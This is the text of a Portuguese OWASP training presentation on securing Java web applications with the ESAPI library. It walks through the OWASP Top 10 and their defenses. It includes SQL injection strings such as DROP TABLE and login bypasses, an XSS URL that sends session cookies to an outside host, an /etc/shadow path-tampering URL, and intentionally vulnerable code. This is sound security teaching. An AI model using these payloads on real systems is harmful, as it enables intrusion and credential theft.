Magno Logan, profile picture
Carregado porMagno Logan
PDF, PPTX943 visualizações

AppSec Brazil 2010 - Utilizando a ESAPI para prover Segurança em Aplicações Web by Tarcizio Vieira Neto

O documento discute o uso da biblioteca OWASP ESAPI para fornecer segurança em aplicações web. Apresenta os objetivos e roteiro do curso, que inclui uma introdução às vulnerabilidades comuns e à arquitetura da ESAPI, com exemplos em Java. Também aborda conceitos como injeção de código e OWASP Top 10.

Tecnologia
Tópicos relacionados:
Web Security Overview

Incorporar apresentação

Transferir como PDF, PPTX
1 / 193
2 / 193
3 / 193
4 / 193
5 / 193
6 / 193
7 / 193
8 / 193
9 / 193
10 / 193
11 / 193
12 / 193
13 / 193
14 / 193
15 / 193
16 / 193
17 / 193
18 / 193
19 / 193
20 / 193
21 / 193
22 / 193
23 / 193
24 / 193
25 / 193
26 / 193
27 / 193
28 / 193
29 / 193
30 / 193
31 / 193
32 / 193
33 / 193
34 / 193
35 / 193
36 / 193
37 / 193
38 / 193
39 / 193
40 / 193
41 / 193
42 / 193
43 / 193
44 / 193
45 / 193
46 / 193
47 / 193
48 / 193
49 / 193
50 / 193
51 / 193
52 / 193
53 / 193
54 / 193
55 / 193
56 / 193
57 / 193
58 / 193
59 / 193
60 / 193
61 / 193
62 / 193
63 / 193
64 / 193
65 / 193
66 / 193
67 / 193
68 / 193
69 / 193
70 / 193
71 / 193
72 / 193
73 / 193
74 / 193
75 / 193
76 / 193
77 / 193
78 / 193
79 / 193
80 / 193
81 / 193
82 / 193
83 / 193
84 / 193
85 / 193
86 / 193
87 / 193
88 / 193
89 / 193
90 / 193
91 / 193
92 / 193
93 / 193
94 / 193
95 / 193
96 / 193
97 / 193
98 / 193
99 / 193
100 / 193
101 / 193
102 / 193
103 / 193
104 / 193
105 / 193
106 / 193
107 / 193
108 / 193
109 / 193
110 / 193
111 / 193
112 / 193
113 / 193
114 / 193
115 / 193
116 / 193
117 / 193
118 / 193
119 / 193
120 / 193
121 / 193
122 / 193
123 / 193
124 / 193
125 / 193
126 / 193
127 / 193
128 / 193
129 / 193
130 / 193
131 / 193
132 / 193
133 / 193
134 / 193
135 / 193
136 / 193
137 / 193
138 / 193
139 / 193
140 / 193
141 / 193
142 / 193
143 / 193
144 / 193
145 / 193
146 / 193
147 / 193
148 / 193
149 / 193
150 / 193
151 / 193
152 / 193
153 / 193
154 / 193
155 / 193
156 / 193
157 / 193
158 / 193
159 / 193
160 / 193
161 / 193
162 / 193
163 / 193
164 / 193
165 / 193
166 / 193
167 / 193
168 / 193
169 / 193
170 / 193
171 / 193
172 / 193
173 / 193
174 / 193
175 / 193
176 / 193
177 / 193
178 / 193
179 / 193
180 / 193
181 / 193
182 / 193
183 / 193
184 / 193
185 / 193
186 / 193
187 / 193
188 / 193
189 / 193
190 / 193
191 / 193
192 / 193
193 / 193
The OWASP Foundation http://www.owasp.org OWASP AppSec Brazil 2010, Campinas, SP Utilizando a API de segurança OWASP ESAPI (Enterprise Security API) para prover segurança em aplicações Web Tarcizio Vieira Neto SERPRO tarciziovn@gmail.com
2 Objetivos do Curso • Conhecer as principais vulnerabilidades de segurança comumente encontradas em aplicações Web. • Apresentar a arquitetura da biblioteca ESAPI e o funcionamento de seus módulos com exemplos em código Java (JSP). • Apresentar o componente Web Application Firewall da ESAPI.
3 Roteiro 1. Introdução 2. OWASP Top 10 3. Biblioteca OWASP ESAPI 4. Vantagens do Uso da Biblioteca ESAPI 5. Conclusões 3.1. Módulo de Validação e Codificação 3.2. Módulo de Autenticação 3.3. Módulo de Controle de Acesso 3.4. Módulo de utilitários HTTP 3.5. Módulo de tratamento de referência de acesso 3.6. Módulo de Criptografia 3.7. Módulo de Log 3.8. Módulo de Detecção de Intrusão 3.9. Integrando o módulo AppSensor com a ESAPI 3.10. Utilizando Filtros 3.11. Configurando a ESAPI 3.12. Módulo Web Application Firewall da ESAPI 1.1. Mitos relacionados à segurança em Aplicações Web 1.2. Projeto OWASP
4 Introdução • Riscos de segurança em aplicações – Os atacantes podem usar diversos caminhos através da aplicação que potencialmente podem prejudicar o negócio ou a organização. – Cada um desses caminhos representa um risco que pode, ou não, ser prejudicial o suficientemente para justificar a sua atenção. Fonte: OWASP Top 10 “A risk is a path from threat agent to business impact.” (OWASP)
5 Introdução Os ataques podem causar uma série de impactos, entre os quais podemos citar: • Perdas Financeiras. • Transações Fraudulentas. • Acesso não autorizado a dados, inclusive confidenciais. • Roubo ou modificação de Dados. • Roubo de Informações de Clientes. • Interrupção do Serviço. • Perda da confiança e lealdade dos clientes. • Dano à imagem da organização.
6 Introdução • Sofisticação dos Ataques X Conhecimento Necessário Fonte: Carnegie Mellon University Software Engineering Institute
7 Introdução Conceitos Básicos: • Análise estática de segurança – Consiste em verificar o código fonte por meio de ferramentas especializadas, sem a necessidade de que a aplicação esteja em execução. – Ferramentas de análise estática são direcionadas a identificação de divergências do código quanto aos padrões de melhores práticas de segurança. – O próprio desenvolvedor deve realizar esta atividade durante a implementação, de forma a corrigir os desvios logo no início do ciclo de vida.
8 Introdução Conceitos Básicos: • Ciclo tradicional de Revisão de Código: – Priorizar qual o código fonte será inspecionado. »entrada e saída de dados; acesso ao banco de dados; – Executar a ferramenta de análise estática. – Realizar um revisão manual do código com base no resultado da ferramenta. –Corrigir o código vulnerável.
9 Introdução Conceitos Básicos: • Evidências: apontamentos ou batimentos que as ferramentas encontram em um código-fonte, identificando possíveis falhas ou vulnerabilidades. • Falso Positivo: ocorre quando a ferramenta aponta uma vulnerabilidade que não pode ser explorada ou que foi tratada. • Falso negativo: ocorre quando a ferramenta não aponta uma vulnerabilidade que na realidade existe e pode ser explorada. • Vulnerabilidade: fragilidade de um sistema que pode ser explorada por um exploit. • Exploração(exploit): é uma ação maliciosa concretizada. Em um ataque, uma ameaça explora uma vulnerabilidade.
10 Introdução Conceitos Básicos: • Blacklist: método de validação que consiste em bloquear todas as entradas de dados consideradas explicitamente inválidas. • WhiteList: método de validação que consiste em bloquear todas as entradas de dados, exceto as que seguirem o padrão explicitamente definido como válido. • Caixa branca: testes do código fonte realizados no momento da codificação para identificar problemas de segurança. • Caixa preta: testes da aplicação em execução realizados em um ambiente controlado, pois simula situações reais de ataques.
11 Introdução  Mitos relacionados à segurança em Aplicações Web 1 - “estamos seguros porque temos um firewall!”  É muito comum criar um falso sentimento de segurança pelo fato da aplicação ter um firewall como entreposto. − Apenas firewalls de aplicação (ou firewall de camada 7) poderiam fornecer um nível de segurança mais adequado. − Ainda que se tenha um firewall de aplicação, alguns detalhes só podem ser implementados na própria aplicação.  Segundo o Gartner Group, 75% dos ataques acontecem na camada de aplicação.  Segundo o NIST, 92% das vulnerabilidades estão no software. National Institute of Standards and Technology
12 Introdução  Mitos relacionados à segurança em Aplicações Web 2 - “estamos seguros porque utilizamos SSL”  O SSL somente provê a confidencialidade e a integridade dos dados trafegados. – De fato não soluciona os problemas relativos às demais vulnerabilidades no servidor e no browser.
13 Introdução  Mitos relacionados à segurança em Aplicações Web 2 - “estamos seguros porque utilizamos SSL” • Deste modo, podemos ter a execução de um “ataque seguro”, ou seja, requisições maliciosas são enviadas para o servidor sobre o protocolo HTTPs:
14 Introdução  Projeto OWASP Sobre a OWASP (Open Web Application Security Project), temos que: • É uma iniciativa aberta para tratar aspectos de segurança de aplicações web • Congrega especialistas e voluntários, que inclui corporações, organizações educacionais e pessoas de todo o mundo • A comunidade trabalha para criar artigos, metodologias, documentação, ferramentas e tecnologias para a segurança das aplicações web. • Cria documentos de boas práticas e promove o desenvolvimento de ferramentas de segurança.
15 Introdução  Projeto OWASP A OWASP • Não é afiliada a nenhuma empresa de tecnologia, pois, considera a liberdade quanto a pressões organizacionais um meio de fornecer de forma imparcial informações sobre segurança de aplicações. Fonte: www.owasp.org
16 Introdução  Projeto OWASP Principais projetos da OWASP: • AntiSamy • Stinger • ESAPI • WebGoat • WebScarab • Development Guide • Testing Guide • CLASP • ASVS
17 Introdução Ferramentas OWASP e base de conhecimento
18 OWASP Top 10 A OWASP produz uma publicação chamada OWASP Top 10, onde lista as 10 principais vulnerabilidades que afetam os sistemas Web. Sobre a publicação: • É lançada a cada 3 anos. • A versão mais recente foi lançada em abril de 2010. • O Top 10 não trata somente como evitar as vulnerabilidades, mas também trata sobre gerenciamento de riscos. • Para gerenciar estes riscos, as organizações precisam além de ações de sensibilização, testes de aplicação e correção, um programa de gestão de riscos de aplicações. • As versões anteriores são de 2004 e 2007. Fonte: OWASP Top 10
19 OWASP Top 10 A1: Injection / Falha de Injeção A2: Cross-Site Scripting (XSS) A3: Broken Authentication and Session Management / Falha na autenticação e no gerenciamento de sessão A4: Insecure Direct Object References / Referência Insegura de Objetos A5: Cross-Site Request Forgery (CSRF) A6: Security Misconfiguration / Configuração de segurança deficiente A7: Insecure Cryptographic Storage / Armazenamento criptográfico inseguro A8: Failure to Restrict URL Access / Falha ao restringir o acesso às URLs A9: Insufficient Transport Layer Protection / Proteção ineficaz da camada de transporte A10: Unvalidated Redirects and Forwards / Redirecionamentos inseguros Versão 2010 Fonte: OWASP Top 10
20 OWASP Top 10 Fonte: OWASP Top 10 Fonte: OWASP Top 10
21 OWASP Top 10  A1: Falhas de Injeção Características: • Ocorrem quando dados não confiáveis são enviados para um interpretador como parte de um comando ou consulta (query) • Os dados do ataque podem iludir o interpretador a executar comandos indesejáveis ou acessar dados de forma não autorizada. • Os ataques de SQL Injection, baseiam-se na tentativa de utilizar os parâmetros de entrada da aplicação para inserir sequências de caracteres com finalidades maliciosas. • Causados também por falta ou falha na validação de entrada de dados
22 OWASP Top 10  A1: Falhas de Injeção Podem ser do tipo: • SQL Injection (mais comum) • XPATH Injection • LDAP Injection, • linguagens de script web • Comand Injection (tem como alvo o sistema operacional do servidor) • Injection into SOAP • SMTP Command Injection → Os princípios são os mesmos, o que muda é a tecnologia.
23 OWASP Top 10  A1: Falhas de Injeção Como evitar: • Os dados não confiáveis devem estar separados dos comandos (interpretadores) e de consultas. • Realizar a validação de entrada de dados positiva ou por Lista Branca (whitelist), com uma adequada normalização dos dados. • Realizar o tratamento dos parâmetros provenientes dos usuários ao realizar a concatenação dos dados
24 OWASP Top 10  A1: Falhas de Injeção Cenário de ataque: String userID = request.getParameter("userID"); Statement statement = connection.createStatement( "SELECT * FROM accounts WHERE user_id = '"+ userID +"';"); ResultSet rs = statement.executeQuery(); A requisição pode ser enviada da seguinte forma: http://example.com/app/accountView?userID=0'+or+1=1-- Resultado da concatenação: SELECT * FROM accounts WHERE user_id = '0' or 1=1--';
25 OWASP Top 10  A1: Falhas de Injeção Cenário de ataque: String userID = request.getParameter("user"); String password = request.getParameter("password"); Statement statement = connection.createStatement( "SELECT * FROM accounts WHERE "+ "user_id = '"+ userID +"' AND "+ "password = '"+ password +"';"); ResultSet rs = statement.executeQuery(); Resultado da concatenação: SELECT * FROM accounts WHERE user_id = 'admin' or 1=1--' AND password = 'anything';
26 OWASP Top 10  A1: Falhas de Injeção Outros exemplos de injeções de código maliciosas: '; DROP TABLE accounts;-- SELECT * FROM accounts WHERE user_id = ''; DROP TABLE accounts;--'; '; INSERT INTO accounts (user_id, password) VALUES ('me','123456');-- SELECT * FROM accounts WHERE user_id = ''; INSERT INTO accounts (user_id, password) VALUES ('me','123456');--';
27 OWASP Top 10  A1: Falhas de Injeção Outros exemplos de injeções de código maliciosas: admin'-- ' or 0=0 -- or 0=0 -- ' or 0=0 # " or 0=0 # or 0=0 # ' or 'x'='x " or "x"="x ') or ('x'='x ' or 1=1-- " or 1=1-- or 1=1-- ' or a=a-- " or "a"="a ') or ('a'='a ") or ("a"="a hi" or "a"="a hi" or 1=1 -- hi' or 1=1 -- hi' or 'a'='a hi') or ('a'='a hi") or ("a"="a
28 OWASP Top 10  A1: Falhas de Injeção Como evitar: • Uso de bind variables através de PreparedStatement String userID = request.getParameter("userID"); PreparedStatement prepStmt = con.prepareStatement("SELECT * FROM accounts WHERE user_id = ?"); prepStmt.setString(1, userID); ResultSet rs = prepStmt.executeQuery();
29 OWASP Top 10  A1: Falhas de Injeção Como evitar: • Uso de stored procedures String username = request.getParameter("username"); String passwd= request.getParameter("password"); CallableStatement cs = con.prepareCall("{call sp_usuario(?,?)}"); cs.setString(1, username); cs.setString(2, passwd); ResultSet results = cs.executeQuery(); CREATE PROCEDURE sp_usuario @USER varchar(16), @PASSWD varchar(16) As SELECT * FROM accounts WHERE user_id = @USER AND password = @PASSWD Go Invocando Stored Procedures Definindo Stored Procedures *Obs.: Consultas dinâmicas com stored procedures podem ser vulneráveis
30 OWASP Top 10  A1: Falhas de Injeção Como evitar: • Uso de parâmetros identificados em consultas HQL Query safeHQLQuery = session.createQuery( "from accounts where userID=:userID"); safeHQLQuery.setParameter("userID", request.getParameter("userID"));
31 OWASP Top 10  A1: Falhas de Injeção Como evitar: • Evitar que caracteres especiais sejam interpretados • Realizar a codificação dos dados –A seguir um exemplo de código utilizando a biblioteca ESAPI String user = ESAPI.encoder().encodeForSQL( Codec.MySQLCodec, request.getParameter("user")); String pwd = ESAPI.encoder().encodeForSQL( Codec.MySQLCodec, request.getParameter("password")); String query = "SELECT * FROM accounts "+ "WHERE user_id = '" + user + "' and passwd = '" + pwd + "'";
32 OWASP Top 10  A1: Falhas de Injeção Como evitar:  Aplicar o Princípio do menor privilégio: –Usuário usado para conectar no banco de dados deve possuir apenas os privilégios mínimos necessários  Validar entrada de dados pelo método white list –Sempre –Validar tamanho, tipo, etc –Validar usando lista ou expressão regular definindo o que é permitido
33 OWASP Top 10  A1: Falhas de Injeção Como evitar:  Validar entrada de dados pelo método white list com ESAPI Validator.SafeString=^[p{L}p{N}.]{0,1024}$ Validator.Email=^[A-Za-z0-9._%-]+@[A-Za-z0-9.-]+.[a-zA-Z]{2,4}$ Validator.IPAddress=^(?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?).){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9] [0-9]?)$ Validator.URL=^(ht|f)tp(s?)://[0-9a-zA-Z]([-.w]*[0-9a-zA-Z])*(:(0-9)*)*(/?)([a-zA-Z0- 9-.?,:'/+=&%$#_]*)?$ Validator.CreditCard=^(d{4}[- ]?){3}d{4}$ Validator.SSN=^(?!000)([0-6]d{2}|7([0-6]d|7[012]))([ -]?)(?!00)dd3(?!0000)d{4}$ String nome = ESAPI.validator().getValidInput( "validacaoActionXPTO", //contexto da operação request.getParameter("nome"),//dados de entrada "validator.SafeString", //identificador da expressão regular 1024, //indica o número máximo de caracteres false //flag que informa se deve ou não aceitar valores nulos );
34 OWASP Top 10  A1: Falhas de Injeção (SO) Como evitar: • Aplicação usa dados enviados pelo usuário para gerar um comando que é passado ao sistema • Se não for feito corretamente o usuário poderá injetar comandos e executá-los com as mesmas permissões da aplicação $dominio = param(‘dominio'); $nslookup = "/path/to/nslookup"; print header; if (open($fh, "$nslookup $dominio|")) { while (<$fh>) { print escapeHTML($_); print "<br>n"; } close($fh); } Aplicação realiza um DNS lookup para um domínio passado pelo usuário
35 OWASP Top 10  A1: Falhas de Injeção Como evitar (de modo geral):  Valide sempre a entrada de dados – Nunca procure por caracteres indesejáveis (black list) – Aceite somente os caracteres que forem válidos para a entrada de dados  Sempre faça a validação no lado do servidor – Javascripts podem ser desabilitados no browser!  Nunca confie na entrada de dados –Valide a entrada de dados mesmo que a origem seja teoricamente confiável  Trate os campos de entrada como string
36 OWASP Top 10  A2: Cross-Site Scripting (XSS) Características: • As falhas XSS ocorrem sempre que uma aplicação obtém dados fornecidos pelo usuário (não confiáveis) e os envia para um navegador web sem realizar o processo de validação ou codificação daquele conteúdo de modo conveniente. • O XSS permite aos atacantes executarem scripts no navegador da vítima, que pode sequestrar sessões de usuário, modificar a aparência de sites Web e redirecionar o usuário para sites maliciosos. Fonte: “Segurança Web: Técnicas para Programação Segura de Aplicações”, AppSec Brasil, 2009
37 OWASP Top 10  A2: Cross-Site Scripting (XSS) Tipos: • Persistente • Não Persistente • Baseado no DOM (Document Object Model)
38 OWASP Top 10  A2: Cross-Site Scripting (XSS) –XSS Persistente Cenário de ataque: • Dados enviados por usuários são armazenados e posteriormente mostrados para outro ou outros usuários sem que sejam codificados • Podem atingir grandes quantidades de usuários (blogs, forums) • Dados armazenados (banco de dados, arquivo, etc) • Sem validar entrada de dados • Sem codificar saída de dados
39 XSS Persistente Fonte: “Segurança Web: Técnicas para Programação Segura de Aplicações”, AppSec Brasil, 2009
40 OWASP Top 10  A2: Cross-Site Scripting (XSS) –XSS Não Persistente Cenário de ataque: • Dado enviado por usuário ao servidor é enviado de volta ao usuário na resposta do servidor. • Caso haja código em meio a esses dados, ele pode ser executado no browser do cliente
41 XSS Não Persistente Fonte: “Segurança Web: Técnicas para Programação Segura de Aplicações”, AppSec Brasil, 2009
42 OWASP Top 10 <input name ='name' type='TEXT' value='" + <%= request.getParameter("paramName") %>+"'"> • A2: Cross-Site Scripting (XSS) –XSS Não Persistente Cenário de ataque: • A aplicação usa dados não confiáveis na construção dos tags HTML sem realizar a codificação dos dados, conforme o exemplo a seguir: • A URL inclui um script no parâmetro da aplicação http://www.example.com/view.jsp?nome="<script>alert(document.cookie)</script>"
43 OWASP Top 10  A2: Cross-Site Scripting (XSS) –XSS Baseado no DOM Cenário de ataque: • O código que executa no browser do usuário utiliza elementos do DOM sem fazer as verificações necessárias. • Falha no código que executa no lado cliente – Neste caso não ocorre falha no lado servidor (camada de controle/negócio)
44 XSS Baseado no DOM Fonte: “Segurança Web: Técnicas para Programação Segura de Aplicações”, AppSec Brasil, 2009
45 OWASP Top 10  A2: Cross-Site Scripting (XSS) Para evitar XSS: • Validar os dados fornecidos para a aplicação –Cabeçalhos –Cookies –Dados de formulários –Campos escondidos • Codificar os dados recebidos pela aplicação antes de utilizar ou armazená-los –Usar escape codes HTML: &lt &gt &#40 &#41
46 OWASP Top 10  A2: Cross-Site Scripting (XSS) O problema da codificação dupla (double encoding): Ex: Char Hex encode Then encoding '%' Double encode “<” “%3C” “%25” “%253C” “/” “%2F” “%25” “%252F” “>” “%3E” “%25” “%253E” <script>alert('XSS')</script> %253Cscript%253Ealert('XSS')%253C%252Fscript%253E
47 OWASP Top 10  A2: Cross-Site Scripting (XSS) Quando um usuário malicioso submete uma URL como: Este ataque pode ser submetido também em hexadecimal, burlando um sistema de validação tradicional (blacklist): http://exemplo.com/formulario.jsp?nome="<script>document.location= 'http://www.cgisecurity.com/cgi-bin/cookie.cgi? '%20+document.cookie</script>" http://exemplo.com/formulario.jsp?nome=%22%3e%3%73%63%72%69%70%74 %3e%64%6f%63%75%6d%65%6e%74%2e%6c%6f%63%61%74%69%6f%6e %3d%27%68%74%74%70%3a%2f%2f77%77%77%2e63%67%69%73%65%63 %75%72%69%74%79%2e%63%6f%6d%2f63%67%69%2d%62%69%6e%2f%63 %6f%6f%6b%69%65%2e%63%67%69%3f%27%20%2b%64%6f%63%75%6d%65 %6e%74%2e%63%6f%6f%6b%69%65%3c%2f%73%63%72%69%70%74%3e
48 OWASP Top 10  A2: Cross-Site Scripting (XSS) Exemplo de métodos da ESAPI que auxiliam na proteção contra XSS: String codificada = ESAPI.encoder().encodeForHTML( request.getParameter( “parametro1" ) ); String codificada = ESAPI.encoder().encodeForHTMLAttribute( request.getParameter( “parametro1" ) ); String codificada = ESAPI.encoder().encodeForJavaScript( request.getParameter( “parametro1" ) ); String codificada = ESAPI.encoder().encodeForCSS( request.getParameter ( “parametro1" ) ); String codificada= ESAPI.encoder().encodeForURL( request.getParameter ( “parametro1" ) );
49 OWASP Top 10  A2: Cross-Site Scripting (XSS) Como evitar:  Como usar a ESAPI para realizar a codificação dos dados nas páginas JSP: <p> Nome <%= ESAPI.encoder() .encodeForHTML(request.getParameter("username")) %> </p>
50 OWASP Top 10  A2: Cross-Site Scripting (XSS) Como evitar (outras formas):  A JSF facilita o processo de encoding dos dados a serem exibidos através das tags (<h:outputText />), da seguinte forma: <h:outputText value="#{bean.name}" /> <p>Nome do usário: #{bean.name}</p> obs.: desta forma será criado um tag implícito do tipo <h:outputText/>
51 OWASP Top 10  A2: Cross-Site Scripting (XSS) Formas inseguras: <p> Nome <%= request.getParameter("username") %> </p> <h:outputText value="#{param.name}" escape="false"> obs.: neste caso o desenvolvedor estaria explicitamente desativando o tratamento dos dados. <h:outputText value="#{bean.name}" escape="false"> obs.: neste caso mesmo desativando o escaping (codificação dos dados) a exibição é segura por se tratar de um bean de entidade!
52 OWASP Top 10  A3: Falha na autenticação e no gerenciamento de sessão Características: • As funções de uma aplicação relacionadas com autenticação e gestão de sessões são muitas vezes implementadas de forma incorreta, permitindo que os atacantes comprometam senhas, chaves, identificadores de sessão ou ainda venham explorar outras falhas de implementação para assumirem a identidade de outros usuários.
53 OWASP Top 10  A3: Falha na autenticação e no gerenciamento de sessão Questões a verificar: 1. As credenciais sempre são protegidas quando armazenadas utilizando hashing ou criptografia? 2. As credenciais podem ser adivinhadas ou sobrepostas através de funções inadequadas no gerenciamento da conta? ex.: criação da conta, mudança de senha, recuperação de senha, identificadores de sessão de sessão fracos. 3. Os identificadores de sessão são expostos na URL? ex.: reescrita de URL. 4. Os identificadores de sessão são vulneráveis à ataques de fixação de sessão? 5. Os identificadores de sessão são desconectados após um determinado período de inatividade e os usuários tem opção para efetuar o logout? 6. Os identificadores de sessão são alterados após a autenticação bem sucedida? 7. As senhas, os identificadores de sessão e outras credenciais são enviadas através de conexões SSL/TLS?
54 OWASP Top 10  A3: Falha na autenticação e no gerenciamento de sessão Como evitar: • Um único modelo de controles para autenticação e gerenciamento de sessão. Estes controles devem ser capazes de: – Atender todos os requisitos para autenticação e gerenciamento de sessão definidos nas áreas V2 (Autenticação) e V3 (Gerenciamento de Sessão) do Application Security Verification Standard (ASVS) publicado pela OWASP. – Fornecer uma interface simples para os desenvolvedores. Considere os módulos ESAPI Authenticator e ESAPI User como bons exemplos para emular, utilizar ou realizar o desenvolvimento baseado nesta biblioteca. • Esforços devem ser tomados para evitar a ocorrência de falhas de XSS que podem ser utilizados para realizar o furto dos identificadores de sessão.
55 OWASP Top 10  A3: Falha na autenticação e no gerenciamento de sessão Cenários de Ataques: 1. A aplicação insere os identificadores de sessão na URL: 2. O procedimento de timeout da aplicação não é adequadamente parametrizado. 3. Um atacante consegue ter acesso a base de dados contendo os registros com as senhas de acesso ao sistema. Caso as senhas não estiverem criptografadas ou estiverem armazenadas utilizando algoritmo de hash fraco, todas as senhas dos usuários do sistema estarão expostas para o atacante. http://example.com/sales;jsessionid=2P0OC2JDPXM0OQSNDLPSKHCJUN2JV?dest=Hawaii
56 OWASP Top 10  A2: Falha na autenticação e no gerenciamento de sessão Como evitar:  Utilizar a biblioteca ESAPI para verificar: – Se o usuário já está autenticado – Se autenticado verificar se não está bloqueado ou se o tempo de timeout de sessão não expirou – É recomendável que o trecho de código a seguir que realiza estas verificações para as páginas que requerem autenticação esteja implementado na forma de um Filtro Java try { ESAPI.authenticator().login(request, response); } catch( AuthenticationException e ) { }
57 OWASP Top 10  A4: Referência Insegura de Objetos Características: • Uma referência direta a um objeto ocorre quando um programador expõe uma referência para um objeto interno da implementação, como: –Arquivo –Diretório –Chave de uma tabela no banco de dados –URL –Parâmetro de formulário
58 OWASP Top 10  A4: Referência Insegura de Objetos  Sem uma verificação de controle de acesso ou outra proteção semelhante, os atacantes podem manipular estas referências para acessar informações ou outros objetos não-autorizados. URL gerada pela aplicação: URL adulterada: http://www.example.com/visualiza_info_conta.jsp?userId="4325110" ← acesso legítimo http://www.example.com/visualiza_info_conta.jsp?userId="5432112" ← acesso indevido
59 OWASP Top 10  A4: Referência Insegura de Objetos  O exemplo de código a seguir mostra como geralmente é realizado um controle por referências diretas para permitir o acesso a determinado arquivo: URL gerada pela aplicação: URL adulterada: http://www.example.com/downloadFile.do?filePath="/opt/docs/file1.doc" http://www.example.com/downloadFile.do?filePath="/opt/docs/file2.doc" http://www.example.com/downloadFile.do?filePath="/etc/shadow" String filePath = "/opt/docs/file1.doc"; String href = "http://www.example.com/downloadFile.do?filePath="" + filePath + """
60 OWASP Top 10  A4: Referência Insegura de Objetos Como evitar: • Evite expor referências a objetos internos. • Valide referências a objetos internos usando lista de nomes válidos • Use índices ou mapas de referência para evitar a manipulação de parâmetros
61 OWASP Top 10  A4: Referência Insegura de Objetos Como evitar: • Use índices ou mapas de referência para evitar a manipulação de parâmetros String filePath = "/opt/myapp/docs/file1.doc"; AccessReferenceMap arm = new RandomAccessReferenceMap(); String indRef = arm.addDirectReference( (String) filePath ); String href = "http://www.example.com/pagina_exemplo?fileRef="" + indRef + """;
62 OWASP Top 10  A4: Referência Insegura de Objetos URL gerada: http://www.example.com/pagina_exemplo?fileRef="abMa27" try { String indRef = request.getParameter( “fileRef” ); String filePath = (String) arm.getDirectReference( indRef ); File file = new File (filePath); // ... instruções que executam operações sobre o objeto File recuperado } catch (AccessControlException ace) { // se a referência indireta não existe, então provavelmente é um ataque // e o método getDirectReference lança uma exceção do tipo // AccessControlException }
63 OWASP Top 10  A5: Cross-Site Request Forgery (CSRF) Características: • Um ataque CSRF força o navegador de uma vítima que tenha uma sessão ativa a enviar uma requisição HTTP forjada para uma aplicação Web vulnerável. – A requisição é pré-autenticada e inclui o cookie de sessão e outras informações da sessão, como informação de autenticação. • Esta falha permite ao atacante forçar o navegador da vítima a criar requisições que a aplicação vulnerável aceite como requisições legítimas oriundos do computador da vítima.
64 OWASP Top 10  A5: Cross-Site Request Forgery (CSRF) Fonte: “Segurança Web: Técnicas para Programação Segura de Aplicações”, AppSec Brasil, 2009
65 OWASP Top 10  A5: Cross-Site Request Forgery (CSRF) Soluções ineficazes: • Aceitar apenas POST –Dificulta mas não resolve »Evita ataques por endereço de imagem –Javascript pode realizar POST –Flash pode realizar POST
66 OWASP Top 10  A5: Cross-Site Request Forgery (CSRF) Soluções ineficazes: • Verificação de “Referer” –Alguns firewalls modificam o “Referer” –Flash pode fazer spoofing do “Referer” –Há casos em que o browser não envia o “Referer”
67 OWASP Top 10  A5: Cross-Site Request Forgery (CSRF) Como evitar: • Usar parâmetro que não pode ser adivinhado pelo atacante • Formas: – Token Secreto → mais fácil e mais recomendável – Requisitar senha nas operações sensíveis
68 OWASP Top 10  A5: Cross-Site Request Forgery (CSRF) Como evitar: • Token secreto. – São associados à sessão do usuário – Os tokens (teoricamente) não podem ser adivinhados pelo atacante – Duas formas de implementar: » A aplicação passa o token em hidden fields nas páginas de resposta e o usuário envia token a cada requisição » A aplicação adiciona o token nos parâmetros das requisições ex: http://example.com/action?param=1&ctoken=8FD4B2
69 OWASP Top 10  A5: Cross-Site Request Forgery (CSRF) • Adicionando token em hidden field. • Adicionando o token nos parâmetros das requisições <input name="csrf_field" type="HIDDEN" value='<%= ESAPI.httpUtilities().getCSRFToken() %>' /> String url = ESAPI.httpUtilities().addCSRFToken( "http://example.com/action?param1=1"); http://example.com/action?param=1&ctoken=8FD4B2
70 OWASP Top 10  A5: Cross-Site Request Forgery (CSRF) Como evitar: • Requisitar Senha – Os atacantes (teoricamente) não conhecem a senha – Solicitar a senha em todas as requisições »Atrapalha a usabilidade »A aplicação deve requisitar apenas para operações sensíveis
71 OWASP Top 10  A6: Configuração de segurança deficiente Características: • A segurança depende também da existência de configurações seguras específicas definidas e usadas na aplicação, frameworks, servidor de aplicação, servidor de Web e plataforma. • Todas as configurações devem ser definidas, implementadas e mantidas por que muitas vezes elas não vem aplicadas diretamente do fornecedor com padrões de segurança definidos. • Isto inclui também possuir todo o software atualizado, incluindo todas as bibliotecas de código usadas pela aplicação. • Tem mais ligação com o ambiente de produção do que com o código da aplicação.
72 OWASP Top 10  A6: Configuração de segurança deficiente Como evitar: • Verificando os seguintes itens: – Existe algum processo de atualização das últimas versões e patches de todo o software para o seu ambiente? Isto inclui o sistema operacional, servidor de aplicações Web, SGBD e demais bibliotecas. –Tudo aquilo que não é necessário está desabilitado, removido, ou não instalado (por ex: portas, serviços, páginas, contas, etc)? –As contas por padrão estão desabilitadas ou foram alteradas? –Todas as configurações de segurança estão definidas corretamente? –Todos os servidores estão protegidos por Firewalls/Filtros, etc?
73 OWASP Top 10  A6: Configuração de segurança deficiente Como evitar: • Estabelecer: –Um processo robusto e repetitivo que torne fácil e rápido o desenvolvimento de outro ambiente que esteja fechado/guardado. Os ambientes de desenvolvimento, garantia da qualidade e produção deverão estar todos configurados da mesma maneira. Este processo deverá ser automatizado para minimizar os esforços necesários para implementar um novo ambiente seguro. –Uma arquitetura robusta que forneça uma boa separação e segurança entre os componentes. –Executar escaneamentos e realizar auditorias periodicamente para auxiliar na detecção de configuração deficiente.
74 OWASP Top 10  A7: Armazenamento criptográfico inseguro Características: • Muitas aplicações Web não protegem devidamente dados sensíveis, como números dos cartões de créditos, dados pessoais e credenciais de autenticação com algoritmos de cifra ou de resumo (hash). • Os atacantes podem roubar ou modificar estes dados, protegidos de forma deficiente, para realizar roubos de identidade, fraude com cartões de crédito ou outros crimes.
75 OWASP Top 10  A7: Armazenamento criptográfico inseguro Como evitar: • Para todos dados sensíveis devemos assegurar que: –Sejam criptografados nos locais onde são armazenados a longo prazo, especialmente nos backups de dados. –Somente usuários autorizados podem acessar as cópias dos dados decriptografados. –Um padrão de algoritmo de criptografia forte (preferencialmente os recomendados pelo e-ping e ICP-Brasil) esteja sendo utilizado. –Uma chave forte tenha sido gerada, protegida contra acesso não autorizado e que a troca das chaves seja planejada.
